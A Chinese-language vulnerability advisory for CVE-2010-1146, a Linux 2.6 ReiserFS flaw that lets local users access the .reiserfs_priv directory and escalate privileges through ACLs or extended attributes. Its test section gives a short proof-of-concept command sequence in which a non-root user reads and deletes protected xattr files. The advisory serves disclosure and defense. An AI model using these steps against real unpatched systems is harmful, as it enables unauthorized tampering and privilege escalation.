发布日期:2010-04-09
更新日期:2010-04-12
受影响系统:
Linux kernel 2.6.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 39344
CVE ID: CVE-2010-1146
Linux Kernel是开放源码操作系统Linux所使用的内核。
Linux Kernel的ReiserFS文件系统实现没有正确地限制对.reiserfs_priv目录的访问,本地用户可以通过修改ACL或扩展属性获得root权限提升。成功攻击要求系统正在使用ReiserFS文件系统。
<*来源:Matt McCutchen
链接:
https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=568041
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
以root:
truncate --size 64M test.reiserfs
mkreiserfs -f test.reiserfs
mkdir /mnt/test
mount -o loop,rw,user_xattr test.reiserfs /mnt/test
setfattr -n user.test -v myvalue /mnt/test
以普通用户:
ls -l /mnt/test/.reiserfs_priv/xattrs/2.0
rm /mnt/test/.reiserfs_priv/xattrs/2.0/user.test # Whoops
建议:
--------------------------------------------------------------------------------
厂商补丁:
Linux
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: